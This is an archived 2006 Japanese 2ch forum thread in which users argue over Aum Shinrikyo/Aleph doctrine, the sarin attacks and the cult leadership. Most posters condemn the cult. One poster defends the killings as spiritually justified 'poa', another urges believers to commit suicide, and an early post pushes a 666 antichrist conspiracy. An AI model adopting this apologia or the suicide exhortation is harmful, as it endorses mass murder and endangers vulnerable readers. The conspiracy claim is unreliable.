5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

果たしてオウム・アーレフの教義は完璧か?85

1 :名無しさん@3周年:2006/10/10(火) 22:56:58 ID:sIbhathJ

⊂二二二二二二二二⊃
    ⊂二二二二二⊃           ,,- 一 - 、
            諸行無常     /      \
             ∧_∧      /     ⊂二二二二二
            /⌒ヽ;,)l|ll 二二二二⊃      |
             i三 U
 ────── 〜三 |───────────────
    ∧_∧     (/~∪
   /⌒ヽ;,)l|ll  三三     ∧_∧ .....次はここだ罠〜・・・
   i三 U    三三    /⌒ヽ;,)l|ll
. 〜三 |   三三    .i丑 U
   (/~∪         〜三 |
 三三            (/~∪
三三            三三


2 :名無しさん@3周年:2006/10/10(火) 22:57:43 ID:sIbhathJ
▼完璧スレ過去ログ保管庫
http://www.geocities.jp/theravada_buddhism/aum/2ch/

▼オウム真理教(宗教団体アーレフ?)探究はここから!!
主要オウム真理教関係へのリンク集

http://www015.upp.so-net.ne.jp/sinzinrui/

▼オウム関連ニュース
Yahoo!ニュース - オウム真理教問題
http://dailynews.yahoo.co.jp/fc/domestic/aum/
Googleニュース - オウム
http://news.google.co.jp/news?hl=ja&ned=jp&q=%E3%82%AA%E3%82%A6%E3%83%A0

▼Aum Txit Archive─「オウム真理教」とはいったい何であったのか?─
http://pureweb.jp/~ata/

3 :名無しさん@3周年:2006/10/10(火) 22:58:28 ID:sIbhathJ
▼前スレ
果たしてオウム・アーレフの教義は完璧か?84
http://life7.2ch.net/test/read.cgi/psy/1160072408/l50


▼過去スレ一覧
果たしてオウム・アーレフの教義は完璧か?
83 http://life7.2ch.net/test/read.cgi/psy/1159631794/l50
82 http://life7.2ch.net/test/read.cgi/psy/1159188031/l50
81 http://life7.2ch.net/test/read.cgi/psy/1158682528/l50
80 http://life7.2ch.net/test/read.cgi/psy/1153720696/l50
79 http://life7.2ch.net/test/read.cgi/psy/1157813193/l50
78 http://life7.2ch.net/test/read.cgi/psy/1157279878/l50
77 http://life7.2ch.net/test/read.cgi/psy/1156732111/l50
76 http://life7.2ch.net/test/read.cgi/psy/1156250676/l50
75 http://life7.2ch.net/test/read.cgi/psy/1155717364/l50
74 http://life7.2ch.net/test/read.cgi/psy/1155200614/l50

4 :名無しさん@3周年:2006/10/10(火) 22:59:24 ID:sIbhathJ
▼過去スレ一覧
73 http://life7.2ch.net/test/read.cgi/psy/1154359060/l50
72 http://life7.2ch.net/test/read.cgi/psy/1153667556/l50
71 http://life7.2ch.net/test/read.cgi/psy/1152997070/l50
70 http://life7.2ch.net/test/read.cgi/psy/1151491031/l50
69−2http://life7.2ch.net/test/read.cgi/psy/1150455381/l50
69−1http://life7.2ch.net/test/read.cgi/psy/1150460085/l50
68 http://life7.2ch.net/test/read.cgi/psy/1149831964/l50
67 http://life7.2ch.net/test/read.cgi/psy/1147515962/l50
66 http://life7.2ch.net/test/read.cgi/psy/1147520306/l50
65 http://life7.2ch.net/test/read.cgi/psy/1146458887/l50
64 http://life7.2ch.net/test/read.cgi/psy/1145749319/l50
63 http://life7.2ch.net/test/read.cgi/psy/1144933300/l50
62 http://life7.2ch.net/test/read.cgi/psy/1143283458/l50
61 http://life7.2ch.net/test/read.cgi/psy/1142411572/l50
60−2 http://life7.2ch.net/test/read.cgi/psy/1141555920/l50

5 :名無しさん@3周年:2006/10/10(火) 23:01:31 ID:oYn09FRz
▼過去スレ一覧
60−1 http://life7.2ch.net/test/read.cgi/psy/1141567712/l50
59 http://life7.2ch.net/test/read.cgi/psy/1140876976/l50
58 http://life7.2ch.net/test/read.cgi/psy/1139778994/l50
57 http://life7.2ch.net/test/read.cgi/psy/1139134269/l50
56 http://life7.2ch.net/test/read.cgi/psy/1138367355/l50
55 http://life7.2ch.net/test/read.cgi/psy/1137412656/l50
54 http://life7.2ch.net/test/read.cgi/psy/1136783998/l50
53 http://life7.2ch.net/test/read.cgi/psy/1136284213/l50
52 http://life7.2ch.net/test/read.cgi/psy/1135344982/l50
51 http://life7.2ch.net/test/read.cgi/psy/1134692088/l50
50 http://life7.2ch.net/test/read.cgi/psy/1133789300/l50
49 http://life7.2ch.net/test/read.cgi/psy/1133113835/l50
48 http://life7.2ch.net/test/read.cgi/psy/1132500945/l50
47 http://life7.2ch.net/test/read.cgi/psy/1131864300/l50
46 http://life7.2ch.net/test/read.cgi/psy/1130893247/l50

6 :名無しさん@3周年:2006/10/10(火) 23:02:15 ID:oYn09FRz
▼過去スレ一覧
45 http://life7.2ch.net/test/read.cgi/psy/1129987264/l50
44 http://life7.2ch.net/test/read.cgi/psy/1129028068/l50
43 http://life7.2ch.net/test/read.cgi/psy/1127486459/l50
42 http://life7.2ch.net/test/read.cgi/psy/1125788508/l50
41 http://life7.2ch.net/test/read.cgi/psy/1123981596/l50
40 http://life7.2ch.net/test/read.cgi/psy/1121165852/l50
39 http://life7.2ch.net/test/read.cgi/psy/1118418943/l50
38 http://life7.2ch.net/test/read.cgi/psy/1115658072/l50
37 http://life7.2ch.net/test/read.cgi/psy/1114349066/l50
36 http://life7.2ch.net/test/read.cgi/psy/1113245836/l50
35 http://life7.2ch.net/test/read.cgi/psy/1111674215/l50
34 http://life7.2ch.net/test/read.cgi/psy/1109225579/l50
33 http://life7.2ch.net/test/read.cgi/psy/1105874920/l50
32 http://life7.2ch.net/test/read.cgi/psy/1103638202/l50
31 http://life7.2ch.net/test/read.cgi/psy/1101814121/l50

7 :名無しさん@3周年:2006/10/10(火) 23:02:51 ID:oYn09FRz
▼過去スレ一覧
30 http://life6.2ch.net/test/read.cgi/psy/1099567285/l50
29 http://life6.2ch.net/test/read.cgi/psy/1096722718/l50
28 http://life6.2ch.net/test/read.cgi/psy/1094344237/l50
27 http://life6.2ch.net/test/read.cgi/psy/1091533953/l50
25−2 http://life6.2ch.net/test/read.cgi/psy/1089745407/l50
25−1 http://life6.2ch.net/test/read.cgi/psy/1088337729/l50
24 http://life6.2ch.net/test/read.cgi/psy/1084182557/l50
23 http://etc.2ch.net/test/read.cgi/psy/1081168591/l50
22 http://etc.2ch.net/test/read.cgi/psy/1079937025/l50
21 http://etc.2ch.net/test/read.cgi/psy/1078924094/l50
20 http://etc.2ch.net/test/read.cgi/psy/1078289939/l50
19 http://etc.2ch.net/test/read.cgi/psy/1077866713/l50
18 http://etc.2ch.net/test/read.cgi/psy/1077625362/l50
17 http://etc.2ch.net/test/read.cgi/psy/1076600547/l50
16 http://etc.2ch.net/test/read.cgi/psy/1075240714/l50

8 :名無しさん@3周年:2006/10/10(火) 23:04:35 ID:Sa0EqMPI
▼過去スレ一覧
15 http://etc.2ch.net/test/read.cgi/psy/1073213953/l50
14 http://etc.2ch.net/test/read.cgi/psy/1071756287/l50
13 http://etc.2ch.net/test/read.cgi/psy/1068336159/l50
12 http://etc.2ch.net/test/read.cgi/psy/1065615770/l50
11 http://etc.2ch.net/test/read.cgi/psy/1063541752/l50
10 http://etc.2ch.net/test/read.cgi/psy/1061296400/l50
09 http://etc.2ch.net/test/read.cgi/psy/1059141640/l50
08 http://etc.2ch.net/test/read.cgi/psy/1056632966/l50
07 http://etc.2ch.net/test/read.cgi/psy/1053615404/l50
06 http://etc.2ch.net/test/read.cgi/psy/1050853885/l50
05 http://life.2ch.net/test/read.cgi/psy/1042359323/l50
04 http://life.2ch.net/test/read.cgi/psy/1039186321/l50
03 http://life.2ch.net/test/read.cgi/psy/1037170497/l50
02 http://life.2ch.net/test/read.cgi/psy/1035025652/l50
01 http://life.2ch.net/test/read.cgi/psy/1027241172/l50

9 :名無しさん@3周年:2006/10/10(火) 23:05:31 ID:Sa0EqMPI

           ,,:'`:、    ,:'`:、:
             ;"  `'''"""''` : : ;;
          .;;          : :;;
          ;;           : :;      
          :;           : :;    拝啓
           ::、 ー   ー ,,'、: : :     
           ,,,:'''  ー  ''" `、: :    >>1様、スレ立て乙です。
           ,,"          `;;: : : :
              :;    ;     ;   .,:: ;;: : : :
      : …ーー;;   `:.、┃  ,:'   .,:'ー‐、: : : : : :         けーぐ
        : :  : 、、:    ゙┃;、;、: _ノ : : : : :
       :   : ./``"''"`′""`"ヽ: : :
         /   :        /
          `"''…、、、:   ./
               `"‐`


10 :さくら:2006/10/10(火) 23:45:47 ID:1bvAZoNK
丑ちゃん。
スレ立て乙。(*^^*)

11 :名無しさん@3周年:2006/10/10(火) 23:56:00 ID:Wk8tSPBi
壁面に666のあるビルの画像発見。
http://www.greatgridlock.net/NYC_Images/tishman.html
http://www.emporis.com/en/il/im/?id=209535

陰謀論の本やサイトでは、ロックフェラーセンタービルの側面には666の数字がデカデカと掲げてあるという話だったが、666の数字が
あるのは、ロックフェラーセンタービルではなく、Tishman Building というビルの側面にある。

と言うと、なーんだやっぱりガセネタだったのかとガッカリしてしまう人も多いだろうが、心配御無用。

このビルは、"ロックフェラーセンター"内のNY5番街"666"番地にあるのだ。

"ロックフェラーセンター"とは、NYの5番街から7番街の48丁目から52丁目までを占める巨大なビジネス・コンプレックスのことであって、
"ロックフェラーセンタービル"とはイコールではない。
(http://www2k.biglobe.ne.jp/~c-navi/ny/rockefeller.htm)

つまり、「ロックフェラーセンタービル側面に666」という話は、ろくにNYについて知りもしない人間(かくいう私も今の今までそうだった
が)が、それらを混同して語り継いだデタラメだったことになる。

しかし、ロックフェラーセンターの中にある以上、当たらずとも遠からずである。いくらこのビルの番地が、666だからといって、ビルの番地を
あたかもビル名のごとくあそこまでデカデカと側面に掲げることは通常考えにくい。やはり、そこには、反キリスト=獣としての意思が働いていた
考えるのが自然だろう。

ちなみに2002年から666という文字は"Citi"という文字に変わっているらしい。
(http://www.thecityreview.com/fifth666.html)

きっこの日記にも、アメリカの意図により、今後、日中戦争が始まると書かれてる。

http://www3.diary.ne.jp/logdisp.cgi?user=338790&log=20060921

12 :名無しさん@3周年:2006/10/10(火) 23:56:15 ID:tCVwyzyo
・青山吉伸:大阪府立高津高校→京都大学法学部
・石井久子:産業能率短期大学
・井上嘉浩:洛南高校→日本文化大学法学部中退
・村井秀夫:大阪府立千里高校→大阪大学理学部物理学科→大阪大学大学院
・早川紀代秀:大阪府立三国丘高校→神戸大学農学部→大阪府立大学大学院
・中川智正:岡山県立岡山朝日高校→京都府立医科大学
・遠藤誠一:北海道立札幌北高校→帯広畜産大学畜産学部獣医学科→京都大学大学院
・土谷正実:東京都立狛江高校→筑波大学農林学類→筑波大学大学院
・豊田亨:白陵高校→東京大学理学部→東京大学大学院
・富永昌宏:灘高校→東京大学医学部
・廣瀬健一:早稲田大学高等学院→早稲田大学理工学部応用物理学科
・端本悟:早稲田大学法学部中退
・村岡達子:上智大学
・富田隆:日本大学理工学部
・林郁夫:慶應高校→慶應義塾大学医学部
・林泰男:工学院大学2部
・渡部和実:東京工業大学
・荒木浩:京都大学文学部
・森正文:大阪市立大学医学部
・佐々木正光:産業医科大学
・平田なんとか:愛知医科大学
・新実智光:愛知学院大学法学部
・満生なんとか:千葉工業大学
・松本知子:千葉県立木更津高校→千葉大学教育学部中退
・高山勇三:早稲田大学商学部
・上祐史浩:早稲田大学高等学院→早稲田大学理工学部電子通信学科→早稲田大学大学院修士課程
・富永昌宏:灘高校→東京大学医学部
そして、我らが尊師は、「熊本県立盲学校高等部」御卒業(藁)

13 :名無しさん@3周年:2006/10/11(水) 12:57:53 ID:NEYLJdrJ
>>996
その無差別というのが間違いであろう。
カルマを見通せる超越者には誰がポアされるか理解している。
カルマを受ける者はあらかじめ決まっていたとも言える。
そもそもカルマを超えた者の意思によりポアがなされたのだから
問題があろうか。



14 :名無しさん@3周年:2006/10/11(水) 12:58:28 ID:v1BwmvNa
漏れは、ハルマゲドンは、予言でなくて、教組がたくらんで起こすつもりで
あったんでないかと 今は思うようになった

なぜなら、サリン70dまけば、死者の山ができる
あるいは、ばい菌撒けば、死者の山ができる
結局失敗ばかりしたが、致死率の高い菌を採取しに、ザイールまで言ったそうだが
なんのためにさ?
なんでその菌が欲しい?
自分らで、ハルマゲドンを起こせば、予言が成就したようにみせかけて
オウムの仕業と、疑う奴が出ないから
いわば、ノストラダムスだか旧約聖書は、隠れ蓑だよ
教組は、自分で世の中滅ぼして、いったん清算して、自分がのっとりたかった
オウムがハルマゲドンを自作し
死人を大量に出し、メチャクチャになれば、誰がやったんだかわからないから
適当に他人のせいにしようと、ノストラダムスは都合が良い言い訳さ

ザイールには、確か教祖も言ったよな
サリンは、弟子が勝手にやったとかいっていたけど
これは教組も関与したと思われても仕方ないな


15 :名無しさん@3周年:2006/10/11(水) 12:58:30 ID:rBauXclE
>>12 テラワロタ。

16 :白龍:2006/10/11(水) 13:01:30 ID:+7PZf5BW
前スレ>>994
オウムの時代はもうすでに終って、アーレフなんですよ。
アーレフ広報部の公式見解が載っていますので、
アーレフ活動規定をみていただきたいのですが、
事件、犯罪を正当化するいかなる教義も信仰しないと、
謳っていますよ。こちらです。

http://info.aleph.to/aleph/kitei.html

アーレフの方なんですよね?

17 :名無しさん@3周年:2006/10/11(水) 13:04:42 ID:v1BwmvNa
細菌兵器は、(貧者の核兵器)と呼ばれるそうだ
核は金がかかるが、細菌兵器は比較的安価だから

だから、ザイールいった
言い訳無用ね
ザイール救済ツアーなど銘打っていたが、世界には病気や貧困にあえぐ人は
たくさんいるの
なぜ、ザイールか
しかも、突如に企画して、一度きりで打ち切りなのはなぜか?
結局、情報収集しても、実行すれば自分らが死ぬから、企画倒れさ


18 :名無しさん@3周年:2006/10/11(水) 13:08:49 ID:v1BwmvNa
なんでこんな教団ができたんだろう?
それは、悪いのは上層さ
しかし、その上層を信じて持ち上げる人間がいる以上
精神も受け継がれるはず、、

日本は住みやすい国であったのに、

19 :名無しさん@3周年:2006/10/11(水) 13:11:42 ID:NEYLJdrJ
>>16
君は上祐氏の元でやっているのだろう。
グルを否定する真理団体というのは理解が難しい。
ハルマゲドンなど一言もでてこないだろうな。
サリンに関しては犯罪でもなければ事件でもない。
現世の法律がそう呼んでいる、君達も含めてね。
今は激動の時期。
私達の乗るマハーヤーナ号は嵐の航海中とも表現できる。



20 :名無しさん@3周年:2006/10/11(水) 13:14:28 ID:v1BwmvNa
知子とアチャリに責任とってもらおうか
まだ、セイタイシの座を離したくないようだし
たくさんの死人が出た教団で、幹部でいるんだぜ

証拠は、教団の金を自由にできるってことさ
権利をよこせっていうなら、責任も持ってもらいましょうか
女子供で智恵がまわらないなんて、言い訳だぜ
権利があるということは、権力があるということだ
じゃあ、事件の責任も肩にかかってくるんだぜ
アチャリは大学出ているんだろ
それくらいの理屈わかるよな?

この女神経太いから、金だけよこしてもらって、責任はしらんぷりしようと
しているんだぜ
幹部だってブイブイ言わせたいなら責任も取れよ
いやなら、幹部であることをやめろよ
幹部ではないなら、金の使い道をきめることができるのか?

知子は離婚していないんだぜ?教組の正式な妻なんだぜ?
なら、責任が重いよな?
世間でも借金して、本人が返せなければ、家族にかかってくるよな?


21 :名無しさん@3周年:2006/10/11(水) 13:16:13 ID:v1BwmvNa
漏れは、ハルマゲドンなど西洋人がいうことで
仏教徒に関係ないと思ってましたけど???
さすがチャンポン真理教ですよね?
ノストラダムスとか、中学生が読むんだと思ってましたよ

22 :白龍:2006/10/11(水) 13:16:49 ID:+7PZf5BW
>>19
私は、上祐さんの路線も今のところ、
懐疑的に見ています。
確かに、教団と言う船は嵐の真っ只中という感じですが、
少なくとも、アーレフの関係者であるならば、
アーレフの公式見解を、
遵守するのが筋ではないかと思うのですが、
いかがですか?
失礼ですが、信徒の方ですか?

23 :名無しさん@3周年:2006/10/11(水) 13:21:03 ID:v1BwmvNa
知子は、遺産は放棄して、被害者に差し出したけど
働いていないのに、ガキにマンション買ってやりましたよね
あんた、殺人犯の正妻なんだぜ
そういわれるのが、嫌なら離婚すれば?
金に困っているだけだろ? うまく権力握って裏で操作しようってんだろ?
貴様、たくさんの死人を出した団体で
よく、シラきって、人よりいい暮らししてやろうなんて
平気で考えているよな
すげーー女だよ
表には、私はなんの力もなく、教組に脅かされていたにすぎない
飾り物の妻ですみたいなことを言って、同情かって、自分は責任の座にないと
いいはって、
お買い物はするんですね 豪快にね

24 :名無しさん@3周年:2006/10/11(水) 13:23:20 ID:v1BwmvNa
ノストラダムスって、フランスの片田舎のオヤジなんだろ
どうして、仏教団体と認めろといいながら
シヴァを祭り、ノストラダムスの予言に人生賭けてしまうんだ?

なんか筋ってないの?

25 :名無しさん@3周年:2006/10/11(水) 13:34:16 ID:v1BwmvNa
功徳をつめって金取り上げて、細菌兵器だのサリンだの自動小銃作る
金につぎ込んで
あんたらどう思っているの?
それは、功徳になったのかしら

人の人生をドブに捨てさせて、その上に平気でマンションを建てるんですね
怒っているんですよ みんな
よく、人もなげなことばかりしてくれますね
あんたらはいいよ
狂信者がいるかぎり、ウマイ汁をすすって、評判はどうあれ
困らないで暮らしていけますからね!


26 :名無しさん@3周年:2006/10/11(水) 13:36:56 ID:v1BwmvNa
ハルマゲドンがくる、って言い張るのは
自分たちが間違った主張をして、人の人生をかきまわしたことに
責任なんか取らされたら まずいからだろ?



27 :名無しさん@3周年:2006/10/11(水) 13:40:22 ID:NEYLJdrJ
>>22
君の言いたいことは承知済みだよ。
出家修行者であるなら公式見解を守るのが筋だとね。
だが見解はあくまで見解であり、それ以上に意味は成さない。
そもそもこのオウムからの改名自体、現世に対応するような形でそうなった。
私はここで本音を語らせてもらった。




28 :名無しさん@3周年:2006/10/11(水) 13:46:53 ID:v1BwmvNa
白龍さんは、まだ常識家だけど
教組自体が表向き言っていることを、裏ではすっかり裏切って
平気でいたんだから
弟子もそれにならって、しらばっくれていても、不思議ないんじゃない
世間に対して約束したことなんか、どうでもいいんだろ?

27は誰だ、危険人物だよ

29 :名無しさん@3周年:2006/10/11(水) 13:48:51 ID:NEYLJdrJ
白龍氏はグルを肯定することに危機感を感じるのかもしれないが。
何を語ることが功徳とするかは君とは違うだろう。
現世に対応した形での信の表現は功徳ではなかろうと思う。
真の功徳を考えてもらいたいものである。
私は形に囚われない修行を実践している。
今の教団がグルの理想とも思ってはいない。
尊師の流れは何も教団が無くなろうが私には影響が無い。
尊師の教えある限り、私の内面に広がっているものだ。
オウム、アーレフに囚われる必要は無い。


30 :名無しさん@3周年:2006/10/11(水) 13:49:27 ID:v1BwmvNa
ハルマゲドンがくるから、救済を急いだと思っているようだが
違うよ
それは言い訳の部分

教組はこう言ったのさ
真島が死んだとき、(これは、ヴァジラヤナで行けと言うシヴァ神の示唆だな)って
真島が死んだとき、ヴァジラで行くと決めたのさ

つまり、法をやぶり 
犯罪を犯すことになると、、

31 :名無しさん@3周年:2006/10/11(水) 13:52:13 ID:v1BwmvNa
ハルマゲドンがくるから、時間がないのか?
違うだろ?警察と敵対したから、追いかけっこになって、
はやくしないと自分が捕まるから、急がせたんじゃないか

その、急がせるために言い訳をいろいろ考えたのさ

32 :白龍:2006/10/11(水) 13:54:35 ID:+7PZf5BW
>>27
出家者なんですか?本当に?
ここで本音を語る意図は何なのですか?
本音では、危険な教義を信奉している人物がいるのだと、
世間に晒すことで、A派の方に何かメリットがあるのでしょうか?
世間から、余計厳しい反発を買うだけだと思うのですが、
違いますか?

33 :名無しさん@3周年:2006/10/11(水) 13:58:03 ID:8rTiVFIk
チヅヲが死んだあかつきには信者は自殺してチヅヲのいる高い世界へ逝け。
この世はカスだから執着するなよ。頼むから早く逝ってくれよ。

34 :名無しさん@3周年:2006/10/11(水) 13:59:11 ID:v1BwmvNa
>何を語ることが功徳とするかは君とは違うだろう。

何を語れば功徳になるのさ?
私が真面目に働いた金で、サリンの原料買ったり、人殺す計画実行ばかりに
使ったけど
私の布施は功徳になったのかね?
私はそれで功徳がつめて、幸せになれるのかね?
徒労に終わったと思うが
うぬぼれて気が変になったのさ いい気になって、人の金取り上げて
まともなことに使ったことがあるのか?
マンション買って、ホテルにいって、民宿泊まって、自分が犯した犯罪のせいで
どれだけ尻拭いに人から金とりあげているんだ?

そんなもの、真理だなんだいって、若い人に押し付けて金取り上げたり
人生とりあげないでくれ
あんたは自分の信の披露に酔いしれているようだけど
やったことの責任はどうするんだ
あんたは自分がそんなに偉いつもりなのか
人をだまして金を取り上げる権利が俺にはあると
使う権利があると
謝らないのは俺の勝手だと? あっそう

35 :名無しさん@3周年:2006/10/11(水) 14:04:00 ID:v1BwmvNa
世間が法律が、っていうけど
勝手にヘマをして転んだのは、教団の人間なんだぜ?
世間を恨むのはいい加減にせよ

真島を殺したのは、世間の人間か?
自分たちのヘマだろうが? それを隠すのに、自分たちで必死に
なって、人を殺して逃げ回って、、
しまいに関係ない世間を恨んでいら
その同じ気持ちで、自分らのことを反省すればいいのに
だれが、ヘマしたんだ?
教団の人間だろ?
なんで、よその他人になすりつけて、自分らを正当化するんだ?
バカもの、恥をシレッってんだ
なんで、貴様らみたいなズルの悪党に、人の道なんか説けるものか
うぬぼれるのもいい加減にせよ

キチガイの集まりだ

36 :名無しさん@3周年:2006/10/11(水) 14:04:15 ID:NEYLJdrJ
>>32
私が本音を語るメリットには世間というものは含まれない。
そもそも尊師御自身、激しいバッシングの中、歩いてこられた。
世間との和合は上祐氏を初めとする考えであろう。
だが真理から離れて行ってしまうよ。
私個人は昔ながらの実践をしているつもりだ。
君は世間にこだわりがあるからだろうが。
一度世間を1.2年離れてみること「遠離」をお勧めする。


37 :名無しさん@3周年:2006/10/11(水) 14:07:27 ID:v1BwmvNa
あんたは、(世間)と(事実)を履き違えている
世間がどう、ではなくて、
事実あったことを教団がしらばくれているんだろうが

世間以上に、あんたらは情報操作し、ウソツキなんだよ
それで、どうやって 真理を見ようとするんだ
真理ってのは、ウソツキでも語れるのか
ウソつきまくっているから、隠し事ばかりしているから、
もってきたんじゃないか
本当のことがばれたら、全く営業できないんだぜ
あんたの教祖はウソつきのくせに
どう、真理を語るなど 偉そうなことがいえるんだ
世間から厭離しても、ウソで固まった出家生活なんか何の意味があるんだ
ただ、現実からの逃避のくせに

38 :名無しさん@3周年:2006/10/11(水) 14:12:44 ID:NEYLJdrJ
>>35
君は殺すとか犯罪とか生死を越えた視点では話せないのだね。
教団にいた全ての者を肯定する気は毛頭ない。
グルへの帰依の本当に強いものだけがその高みへと上ってゆける。
凡夫に成り下がった盛就者も居よう。



39 :名無しさん@3周年:2006/10/11(水) 14:13:45 ID:v1BwmvNa
世間を離れるのは、そこがチリにまみれ虚偽の世界だから

あんたらは、世間の普通の人より虚偽の中に生きているんだぜ?

信者を騙した金でメシを食い、テレクラ嬢の上前をはねメシを食い
麻薬売って金を作り
なんでか、真面目に働いたらいけないって思っているのよね
放っておくと、なぜか薄汚い方法で儲けようとしてさ
不潔きわまりないの
それで、神聖出家気取って
ちゃんちゃらおかしいって言ってんだよ
何が真理だ 薄汚れているくせに

あんたたちはすでに、世間の人間より薄汚れているんだよ
どこの聖者が、信者に解脱させてやるって取り上げた金
暴力団に貢いでいるんだ ドアホウ
世の中を清らかにするどころか
カルマを悪くする働きの奴とばかり、つるんでいるじゃないか


40 :名無しさん@3周年:2006/10/11(水) 14:16:34 ID:v1BwmvNa
38
バカやろう、ヘマで殺して、口をぬぐっていたって言っているだろうが
その間違いは、誰がしたんだ
教団の人間だろうが? 自分らのバカさ加減でも嘆いたらどうなんだ
人になすりつけることばかり考えて
ズルイ奴は聖者になる資格なんかない

41 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:16:35 ID:OAY3xraV
前スレ >>995

俺の名前は出しておいて自分は個人特定に繋がるからですか・・・。
自分たとは真理だと自信があるならステージくらい堂々と公表なさい。

42 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:17:51 ID:OAY3xraV
さてさて

マーラの世迷言を吐く者達を斬っちゃうぞぉw

43 :名無しさん@3周年:2006/10/11(水) 14:21:02 ID:v1BwmvNa
>君は殺すとか犯罪とか生死を越えた視点では話せないのだね。

だから、答えろよ
あんたは、教組が誰それをポアしたと、
たとえば、天界にポアした 教祖の飼っていた猫は
修羅の道があって、教組がポアして天界送ったと
あんたは見たのか? 見て確認できたのか?
それができてから、殺人肯定の論もふりまわせ

坂本は地獄、奥さんはガキ、子供は動物と
教組はいった、 あんたは、行って確認したか
坂本が地獄に、奥さんが餓鬼に、こどもが動物に転生したのを
明らかに確認したか?
自分でできないくせに、他人にどう信じろってんだ?
証拠を出せ、それができなければ盲信だ
教組がそう言い張ったものを、あんたも確認できないのに、信じたという事実があるだけだ


44 :白龍:2006/10/11(水) 14:22:39 ID:+7PZf5BW
>>29
あなたが、教団から離れた方であったり、
信徒の方であったなら、別にグルを肯定し、
ハルマゲドンを信じ、事件を肯定していても、
まあ仕方がないかなと思います。
そういう人もいるでしょうから。

しかし、出家者が、そのような発言をするのは、
A派にとってマイナスなのではないかなと思ったものですから、
発言したまでです。
でも、あなたにとってはそれもどうでも良いみたいですね。

私は、信徒なので、グルを肯定することに危機感など抱いておりません。
現在、否定も肯定もフラットな状態です。
かつて開祖は、グルですら幻影なのだよと、
おっしゃていたので、その意味は深遠だと思っています。

このような意見を述べる方が、
いまだにいるということは、ある意味貴重かもしれませんね。

45 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:23:50 ID:OAY3xraV
>>13
>その無差別というのが間違いであろう。カルマを見通せる超越者には誰がポアされるか理解している。
カルマを受ける者はあらかじめ決まっていたとも言える。そもそもカルマを超えた者の意思によりポアがなされたのだから
問題があろうか。

麻原が三界を超越しているという証拠をまず示せ。
サマディさえ示さなかった者をどうして解脱していると言えるのか?
あんたらの論ではまるで解脱者には生殺与奪の権利があるように言うのだな。
解脱者にそんな権利があるとは仏典のどこにも、どの教えにも無いのだが?
言いか良く聞け。その論には第五天〜大六天界の論理があるぞ。即ち生殺与奪だ。


46 :名無しさん@3周年:2006/10/11(水) 14:25:07 ID:v1BwmvNa
あんたは、教組が殺した人間が、教組の言ったとおりの場所に転生したのを
明らかに見たんだな?

おぼえておけよ、教組は平然とウソをつく性格だからな
適当いっていた可能性はあるんだぜ?
あんたは、それすら(教組の言ったポアが本当に言ったとおりになったか)
確認できないんだろうが
それで、殺して何が悪い、って言うのか?

47 :名無しさん@3周年:2006/10/11(水) 14:26:19 ID:NEYLJdrJ
>>43
それに近いヴィジョンを見たとだけ言っておく。
また三昧に入り、死と転生のプロセスをある程度理解できるようになれば
自ずと理解、納得は生ずる。


48 :さくら:2006/10/11(水) 14:31:08 ID:QaLpFBgS
>>47
それってさ〜。
あなたの願望が見せた幻じゃあないのかなぁ

49 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:31:11 ID:OAY3xraV
>>19
>君は上祐氏の元でやっているのだろう。グルを否定する真理団体というのは理解が難しい。

グルであろうと間違っているならば正す。
これが出来なかったから我々はおかしくなったのだ。ニンマやカギュにはキチンと
「グルと仏典と言ってることが対立するならばグルを正せ」
と説いている。

>ハルマゲドンなど一言もでてこないだろうな。サリンに関しては犯罪でもなければ事件でもない。

本音がでたね。
君はマーラに支配されているね。生殺与奪の権利がまるで自分にあるように思ってるのだね。

>現世の法律がそう呼んでいる、君達も含めてね。 今は激動の時期。
私達の乗るマハーヤーナ号は嵐の航海中とも表現できる。

激動の時期だから人を殺してもいいとは仏教は言わない。
あなたたちの船の船頭、その背後にはマーラが憑いていて、出来るだけ多くの人間を
大渦の中に飲み込ませようとしていた。そして今もしている。


50 :名無しさん@3周年:2006/10/11(水) 14:35:21 ID:v1BwmvNa
>それに近いヴィジョンを見たとだけ言っておく。
また三昧に入り、死と転生のプロセスをある程度理解できるようになれば
自ずと理解、納得は生ずる。

自分の修行の結果として、自分で神秘体験をするというのは、私もある
だから、神秘性をまったく否定するつもりはないが、
それが、他人のポア、というのに及んだ場合、
他人のことであるがゆえに、どこまで本当なのか こちらには確めようが無い
自分が神秘体験があるから、他人のポアも正当だ、とは
私にはいえない
自分が、死と転生のプロセスを理解したのと、実際に殺された人が
言われたとおりの場所に転生したのを確認したのは、全く別問題であって
その程度の論拠で人を殺せるのがおかしい

51 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:37:22 ID:OAY3xraV
>>38
>君は殺すとか犯罪とか生死を越えた視点では話せないのだね。
教団にいた全ての者を肯定する気は毛頭ない。
グルへの帰依の本当に強いものだけがその高みへと上ってゆける。
凡夫に成り下がった盛就者も居よう。

そのグル(自身)が信に値する者なのか、果してちゃんと解脱しているのか・・
自らの正しさは自らが証明し続けなければならないはずだ。
それができなかったのだ。
信に値しない。解脱などしていない。

52 :名無しさん@3周年:2006/10/11(水) 14:43:03 ID:v1BwmvNa
つまり、これは明確であり、全くの事実であり、ポアは間違いなく成功したと
いえる根拠がどこにもないのに
アレは正しいと、言えるたぶん男であろう、あんたのオツムが心配だ

>また三昧に入り、死と転生のプロセスをある程度理解できるようになれば
自ずと理解、納得は生ずる。

あんたは詭弁を吐くつもりかしれんが、そのことと、教組が確実に殺した人間を
ポアしたか、確めたかは別問題だぜ
つまり、ある程度の数の、転生例をみて、こうであろうと、類推したと
そのことをあんたは言っているんだろうが、
私は、転生があるということについて、疑っているのではなくて
ポアの技術の確かさについて、私は聞いている
教組のポアの技術が確かか、あんたは確信があるのか


53 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:43:54 ID:OAY3xraV
>>47
>それに近いヴィジョンを見たとだけ言っておく。
また三昧に入り、死と転生のプロセスをある程度理解できるようになれば
自ずと理解、納得は生ずる。

それ君の妄想。
インドヒマラヤヨーガの瞑想システムやテーラヴァーダの瞑想などを習って分ったけど
オウムのシステムでは瞑想中に見るのは自己の心の汚れや妄想だけ。
サマディ・三昧には入れないよ。その方向とはベクトルが違う方向の瞑想をさせられるから。
つまり死と転生のプロセスを理解したつもりになって妄想して、相手がどこどこに転生したっていう
